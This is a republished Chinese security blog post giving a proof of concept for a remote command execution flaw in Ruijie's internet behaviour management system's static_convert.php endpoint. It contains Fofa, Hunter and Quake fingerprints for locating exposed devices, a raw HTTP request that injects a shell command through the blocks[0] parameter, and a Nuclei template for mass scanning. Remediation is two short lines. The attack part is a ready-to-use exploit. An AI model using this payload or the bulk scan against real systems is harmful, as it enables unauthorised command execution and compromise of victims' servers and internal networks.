锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc

admin 2024年6月22日21:43:04评论33 views字数 1890阅读6分18秒阅读模式
0x01 免责声明
disclaimer

 

0x02 漏洞介绍
Vulnerability introduction
    锐捷上网行为管理系统/view/IPV6/naborTable/static_convert.php接口存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。
0x03 搜索语法
Search for syntax
  • Fofa:
body="c33367701511b4f6020ec61ded352059"
  • Hunter
body="c33367701511b4f6020ec61ded352059"
  • Quake
body="c33367701511b4f6020ec61ded352059"

锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc

0x04 漏洞复现
Request packets
  • 请求接口执行任意命令,例如写入文件
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'abab'%20>>%20/var/www/html/test.txt%0A HTTP/1.1
Host:your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc
  • 访问路径/test.txt
锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc
0x05 nuclei POC
nuclei POC
  • Nuclei 批量检测POC
  • 所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: Ruijie_RG-UAC_static_convert_RCE

info:
  name: Ruijie_RG-UAC_static_convert_RCE
  author: security-xm
  severity: high
  description: 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
  metadata:
    max-request: 2
    shodan-query: ""
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'abab'%20>>%20/var/www/html/test.txt%0A HTTP/1.1
    Host: {{Hostname}}
    Accept: application/json, text/javascript, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

  - |+
    @timeout: 30s
    GET /test.txt HTTP/1.1
    Host: {{Hostname}}
    Accept: application/json, text/javascript, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - abab
      condition: and
锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc
0x07 修复建议
Remediation recommendations
  • 在Web应用防火墙中添加接口临时黑名单规则
  • 联系厂商打补丁或升级版本。

锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc

原文始发于微信公众号(小明信安):【漏洞复现 | 含批量POC】锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月22日21:43:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 pochttps://cn-sec.com/archives/2874512.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息